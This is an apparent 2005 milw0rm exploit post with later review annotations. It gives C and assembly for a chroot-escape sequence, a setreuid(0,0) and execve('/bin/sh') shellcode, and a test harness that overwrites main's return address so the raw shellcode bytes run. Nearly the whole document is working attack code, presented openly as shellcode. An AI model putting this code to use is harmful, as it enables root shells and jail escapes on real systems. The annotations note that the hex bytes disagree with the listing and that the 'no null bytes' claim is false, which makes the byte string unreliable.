Linux/x86 chroot and standard shellcode.
By Okti (http://okti.nm.ru)
----------------------------------------------------------------------------------------------
/* Mkdir and Chroot are written in C: */
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/stat.h>
/*
 * Entry point: creates the directory "sh", makes it root-owned with mode
 * 0600, chroots into it, then chroots again on a long relative "../" path.
 * This is the source the GAS listing and the hex bytes further down were
 * produced from, so the call sequence is kept exactly as published.
 *
 * Every return value is discarded: a failing mkdir() (e.g. EEXIST) or a
 * chroot() refused with EPERM is silent and the remaining calls still run.
 * NOTE(review): chroot(2) needs CAP_SYS_CHROOT, i.e. root in practice;
 * confirm the privilege context before reasoning about what this does.
 */
int main(void) {
    mkdir("sh", 0);                  /* directory "sh", initially with no permission bits */
    chown("sh", 0, 0);               /* owner uid 0, group gid 0 */
    chmod("sh", S_IRUSR | S_IWUSR);  /* 0600; the asm below passes this as pushl $384 */
    chroot("sh");                    /* root becomes ./sh; chroot(2) leaves the working directory unchanged */
    /* Original comment: "But many '../' as possible, i'm to lazy to add comments ;)".
     * The relative path is resolved from the working directory, which the
     * previous chroot() did not change. */
    chroot("../../../../../../../../../../../../../../../../../../../../../../../../");
}
----------------------------------------------------------------------------------------------
Asm version of the above C code:
----------------------------------------------------------------------------------------------
# GCC 3.4.1 output for the C listing above (i386, AT&T syntax).
# Extraction dropped the tab between each directive/mnemonic and its
# operands; the separators are restored here, nothing else is changed.
.file "y.c"
.section .rodata
.LC0:
.string "sh"                    # path passed to mkdir/chown/chmod/chroot
.align 4
.LC1:
# NOTE(review): this string appears shorter than the one in the C source
# above, so the two listings were probably not produced from the same file.
.string "../../../../../../../../../../../../../../../../../../../../"
.text
.globl main
.type main, @function
# int main(void) -- cdecl, i386 SysV. No register roles beyond %eax/%esp/%ebp;
# every libc call gets its arguments pushed right-to-left and popped with addl.
# (Extraction had fused each mnemonic with its operand; separators restored.)
main:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $8, %esp
        andl    $-16, %esp              # GCC 3.x main() prologue: force 16-byte alignment
        movl    $0, %eax                # ((0 + 15) + 15) >> 4 << 4 == 16 ...
        addl    $15, %eax
        addl    $15, %eax
        shrl    $4, %eax
        sall    $4, %eax
        subl    %eax, %esp              # ... so this reserves 16 more bytes
        # For each call: the subl pad plus the pushed arguments total 16 bytes,
        # keeping %esp 16-aligned at the call; addl $16 discards them all.
        subl    $8, %esp
        pushl   $0                      # mode 0
        pushl   $.LC0                   # "sh" -- absolute address, non-PIC executable code
        call    mkdir
        addl    $16, %esp
        subl    $4, %esp
        pushl   $0                      # gid 0
        pushl   $0                      # uid 0
        pushl   $.LC0
        call    chown
        addl    $16, %esp
        subl    $8, %esp
        pushl   $384                    # 0600 == S_IRUSR | S_IWUSR
        pushl   $.LC0
        call    chmod
        addl    $16, %esp
        subl    $12, %esp
        pushl   $.LC0
        call    chroot                  # chroot("sh"); return value discarded
        addl    $16, %esp
        subl    $12, %esp
        pushl   $.LC1
        call    chroot                  # chroot("../../..."); return value discarded
        addl    $16, %esp
        leave                           # %eax is never set here: the exit status is
        ret                             # whatever the last chroot() left in %eax
.size main, .-main
# Empty .note.GNU-stack section: tells the linker this object does not
# need an executable stack. (Separators restored after extraction.)
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"
------------------------------------------------------------------------------------------------
Standard setreuid and execve shellcode (66 bytes).
It is all clean and tidy; it uses 'push' and 'pop' to get the string '/bin/sh' from the data segment,
and has no null bytes.
For details, assemble this asm code with: nasm -f elf shell.asm, then link it with ld shell.o and run ./a.out.
------------------------------------------------------------------------------------------------
; NASM, i386, Linux int 0x80 ABI (eax = number, args in ebx, ecx, edx).
section .data
; This copy of the string is never referenced by the code: the code takes
; its '/bin/sh' from the copy that follows "call one" below. No
; "section .text" follows, so with nasm -f elf the code itself is assembled
; into .data as well (writable; whether it is mapped executable depends on
; the linker and kernel -- on a W^X system it would fault).
db '/bin/sh'
global _start
_start:
; setreuid(uid_t ruid, uid_t euid)   (the published comment misspelt it "setruid")
        xor eax, eax
        mov al, 70                      ; i386 syscall 70 = setreuid
        xor ebx, ebx                    ; ruid = 0
        xor ecx, ecx                    ; euid = 0
        int 0x80                        ; result in eax is not checked
        jmp two                         ; forward jump; the hex below encodes it as e9 rel32
one:
        pop ebx                         ; ebx = return address pushed by "call one"
                                        ;     = address of the '/bin/sh' bytes at the end
; execve(const char *filename, char *const argv[], char *const envp[])
        xor eax, eax
        mov [ebx+7], al                 ; NUL-terminate the string in place: a write into the
                                        ; section that holds this code (needs a writable mapping)
        mov [ebx+8], ebx                ; argv[0] = pointer to '/bin/sh'
        mov [ebx+12], eax               ; argv[1] = NULL; the same word serves as the empty envp
        mov al, 11                      ; i386 syscall 11 = execve
        lea ecx, [ebx+8]                ; argv
        lea edx, [ebx+12]               ; envp
        int 0x80                        ; on failure there is no exit path: execution falls
                                        ; into "two:" and the call/pop sequence repeats forever
two:
        call one                        ; pushes the address of the next line, jumps back to "one"
        db '/bin/sh'                    ; 7 bytes, no terminator; terminator and argv are
                                        ; written into the bytes after it at runtime (above)
---------------------------------------------------------------------------------------------------
Hex opcodes of the mkdir, chroot and above shellcode asm instructions (in C).
---------------------------------------------------------------------------------------------------
#include<stdio.h>
#include<stdlib.h>
/*
 * Test harness: keeps the raw bytes in a stack buffer and redirects main's
 * return into it. It relies on a particular GCC 3.x -O0 frame layout (the
 * saved return address sitting `offset` ints above the local `ret`), on an
 * executable stack, and on ILP32 -- the `(int)` cast truncates a 64-bit
 * pointer. On a build with a non-executable stack this faults instead of
 * running.
 *
 * The byte string is a concatenation of three fragments, not one
 * self-contained payload; see the notes between them.
 */
int main() {
    int *ret;
    long offset = 4;
    char star[] =
    /* Fragment 1 (17 bytes): mov edx,ebx; mov ecx,[esp+8]; mov ebx,[esp+4];
     * mov eax,39 (mkdir); int 0x80. It reads its arguments from a C stack
     * frame, contains NUL bytes, and has no ret. */
    "\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"
    /* Fragment 2 (13 bytes): same shape with eax = 61 (chroot); no ret, so
     * execution falls straight into the bytes of fragment 3. */
    "\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"
    /* Fragment 3 (56 bytes): the NASM listing above, starting with its
     * "section .data" copy of '/bin/sh' (7 bytes), which is then executed
     * as code. The jmp is encoded as e9 rel32 (16 00 00 00), so the
     * "no null bytes" claim does not hold for these bytes.
     * NOTE(review): the bytes 89 58 08 do not encode the listing's
     * `mov [ebx+8], ebx`; the hex and the NASM listing disagree at that
     * instruction, so the listing is the more reliable description. */
    "\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"
    "\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"
    "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68";
    /* Overwrite the word `offset` ints above `ret` with the buffer's address;
     * undefined behaviour in C, valid only for the frame layout noted above. */
    *((int * ) &ret + offset) = (int) star;
}
// milw0rm.com [2005-07-11]